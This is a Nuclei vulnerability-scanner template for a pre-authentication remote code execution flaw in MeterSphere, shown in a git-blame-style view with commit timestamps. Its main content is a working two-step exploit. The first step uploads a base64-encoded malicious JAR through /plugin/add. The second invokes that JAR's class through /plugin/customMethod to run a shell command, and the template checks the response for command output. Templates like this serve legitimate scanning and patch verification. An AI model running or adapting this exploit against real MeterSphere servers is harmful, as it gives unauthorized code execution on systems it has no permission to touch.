2022-01-15 21:36:09 +00:00
|
|
|
id: metersphere-plugin-rce
|
|
|
|
|
|
|
|
info:
|
2022-05-26 19:23:19 +00:00
|
|
|
name: MeterSphere - Remote Code Execution
|
2023-02-19 12:23:06 +00:00
|
|
|
author: pdteam,y4er,pdresearch,rootxharsh,iamnoooob
|
2022-01-15 21:36:09 +00:00
|
|
|
severity: critical
|
2022-05-31 09:03:16 +00:00
|
|
|
description: |
|
|
|
|
MeterSphere is susceptible to remote code execution.
|
2022-01-15 21:36:09 +00:00
|
|
|
reference:
|
|
|
|
- https://y4er.com/post/metersphere-plugincontroller-pre-auth-rce/
|
|
|
|
- https://github.com/metersphere/metersphere
|
2022-05-26 19:23:19 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
|
|
cvss-score: 10.0
|
|
|
|
cwe-id: CWE-77
|
2023-02-19 12:23:06 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 2
|
2023-02-19 12:23:06 +00:00
|
|
|
verified: true
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: metersphere,rce,intrusive
|
2022-01-15 21:36:09 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-01-15 21:36:09 +00:00
|
|
|
- raw:
|
2022-01-18 05:16:50 +00:00
|
|
|
- |
|
|
|
|
POST /plugin/add HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept: application/json, text/plain, */*
|
|
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryreButJNjkCniQExX
|
|
|
|
|
|
|
|
------WebKitFormBoundaryreButJNjkCniQExX
|
2023-02-19 12:23:06 +00:00
|
|
|
Content-Disposition: form-data; name="file"; filename="metersphere-plugin-DebugSampler-1.0.1-jar-with-all-dependencies.jar"
|
2022-01-18 05:16:50 +00:00
|
|
|
Content-Type: application/octet-stream
|
|
|
|
|
2023-02-19 12:23:06 +00:00
|
|
|
{{base64_decode("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
|
2022-01-18 05:16:50 +00:00
|
|
|
------WebKitFormBoundaryreButJNjkCniQExX
|
|
|
|
Content-Disposition: form-data; name="request"; filename="blob"
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
null
|
|
|
|
------WebKitFormBoundaryreButJNjkCniQExX--
|
|
|
|
|
2022-01-15 21:36:09 +00:00
|
|
|
- |
|
|
|
|
POST /plugin/customMethod HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Origin: {{BaseURL}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
2023-02-19 12:23:06 +00:00
|
|
|
{"entry":"io.metersphere.plugin.DebugSampler.UiScriptApiImpl","request":"id"}
|
2022-01-15 21:36:09 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-05-31 09:03:16 +00:00
|
|
|
part: body
|
2022-01-15 21:36:09 +00:00
|
|
|
words:
|
|
|
|
- '"data":'
|
|
|
|
- '"success":true'
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-05-26 19:23:19 +00:00
|
|
|
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|